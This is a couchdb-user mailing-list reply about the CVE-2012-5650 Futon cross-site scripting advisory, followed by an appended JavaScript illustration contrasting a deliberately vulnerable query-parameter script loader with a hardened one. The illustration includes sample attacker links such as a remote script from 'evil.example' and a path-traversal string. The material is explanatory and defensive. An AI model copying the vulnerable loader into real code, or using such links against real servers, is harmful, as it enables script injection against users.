couchdb-user mailing list archives

From "Eli Stevens (Gmail)" <wickedg...@gmail.com>
Subject Re: CVE-2012-5650 Apache CouchDB DOM based Cross-Site Scripting via Futon UI
Date Mon, 14 Jan 2013 16:14:35 GMT
(I've trimmed the CC list; apologies if that's incorrect)

Would it be possible to get a more complete description of this issue?

Specifically, it would be nice to get a more exact description of the
access required for an attacker to initiate the attack.  I can make some
reasonable guesses, but I would rather not rely on guesses when it comes to
issuing updates to our customers.

Thanks,
Eli


On Mon, Jan 14, 2013 at 2:05 AM, Jan Lehnardt <jan@apache.org> wrote:

> CVE-2012-5650
>
> DOM based Cross-Site Scripting via Futon UI
>
> Affected Versions:
> Apache CouchDB releases up to and including 1.0.3, 1.1.1, and 1.2.0
> are vulnerable.
>
> Description:
> Query parameters passed into the browser-based test suite are not sanitised,
> and can be used to load external resources. An attacker may execute JavaScript
> code in the browser, using the context of the remote user.
>
> Mitigation:
> Upgrade to a supported release that includes this fix, such as Apache
> CouchDB 1.0.4, 1.1.2, 1.2.1, and the future 1.3.x series, all of which
> include a specific fix.
>
> Work-Around:
> Disable the Futon user interface completely, by adapting `local.ini` and
> restarting CouchDB:
>
>     [httpd_global_handlers]
>     _utils = {couch_httpd_misc_handlers, handle_welcome_req, <<"Forbidden">>}
>
> Or by removing the UI test suite components:
>
>     share/www/verify_install.html
>     share/www/couch_tests.html
>     share/www/custom_test.html
>
> Acknowledgement:
> This vulnerability was discovered & reported to the Apache Software Foundation
> by Frederik Braun https://frederik-braun.com/
>
> Jan Lehnardt
> --

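The advisory quoted above describes the class of bug but not the code: a query parameter chosen by whoever crafts the link decides which resources the test-suite page loads. The following is an added illustration, not Futon's code and not part of either message. It models that pattern in a constructed page loader (`parseQuery`, `vulnerableScriptTags`, `hardenedScriptTags` and the `script/test/` directory are all assumptions made for the example): the vulnerable version turns the parameter straight into a `<script src>`, so a link such as `?script=//evil.example/x.js` pulls remote JavaScript into the origin of the CouchDB server, and the hardened version only accepts bare test names and resolves them inside a fixed local directory. Nothing here is executed in a browser; the functions return the tags the page would have written so the behaviour can be checked offline.

```javascript
// Added example (not Futon's code): a DOM-based XSS pattern of the kind the
// advisory describes, beside a hardened variant. All names are assumptions.

// Fixed, server-local directory that legitimate test scripts live in (assumed).
const TEST_SCRIPT_DIR = 'script/test/';

// Parse a location.search-style string ("?a=1&b=x+y") into a plain object.
function parseQuery(search) {
  const out = {};
  const q = search.startsWith('?') ? search.slice(1) : search;
  if (!q) return out;
  for (const pair of q.split('&')) {
    const eq = pair.indexOf('=');
    const rawKey = eq === -1 ? pair : pair.slice(0, eq);
    const rawVal = eq === -1 ? '' : pair.slice(eq + 1);
    out[decodeURIComponent(rawKey)] = decodeURIComponent(rawVal.replace(/\+/g, ' '));
  }
  return out;
}

// VULNERABLE: the `script` parameter is used verbatim as a script source.
// Any URL the attacker puts in the link (protocol-relative, absolute, or a
// path-traversal string) becomes a <script src=...> in the page's origin.
function vulnerableScriptTags(search) {
  const params = parseQuery(search);
  const names = (params.script || '').split(',').filter(Boolean);
  return names.map((name) => '<script src="' + name + '"></script>');
}

// HARDENED: only a bare identifier is accepted, and it is resolved inside a
// fixed local directory, so the parameter can pick *which* bundled test runs
// but can never name an external or out-of-tree resource.
function hardenedScriptTags(search) {
  const SAFE_NAME = /^[A-Za-z0-9_-]+$/;
  const params = parseQuery(search);
  const names = (params.script || '').split(',').filter(Boolean);
  return names
    .filter((name) => SAFE_NAME.test(name))
    .map((name) => '<script src="' + TEST_SCRIPT_DIR + name + '.js"></script>');
}

// Constructed sample links, as an attacker and a legitimate user might use them.
const SAMPLE_LINKS = [
  '?script=basics,all_docs',            // legitimate: two bundled tests
  '?script=//evil.example/x.js',        // attacker: remote script
  '?script=..%2F..%2F_utils%2Fx',       // attacker: traversal after decoding
];

// Side-by-side report of what each version of the loader would emit.
function compareLoaders(links) {
  return links.map((link) => ({
    link,
    vulnerable: vulnerableScriptTags(link),
    hardened: hardenedScriptTags(link),
  }));
}

// Stand-alone run: print the comparison (browser use would write the hardened
// tags into the document instead; this file only computes them).
if (typeof module !== 'undefined' && require.main === module) {
  for (const row of compareLoaders(SAMPLE_LINKS)) {
    console.log(row.link);
    console.log('  vulnerable:', row.vulnerable);
    console.log('  hardened:  ', row.hardened);
  }
}
```

The check a practitioner would want after applying the advisory's work-around is the same in spirit: a request for the test-suite pages under `_utils` should no longer return them at all, and once a fixed release is installed the page should behave like `hardenedScriptTags` rather than `vulnerableScriptTags` when fed an external URL.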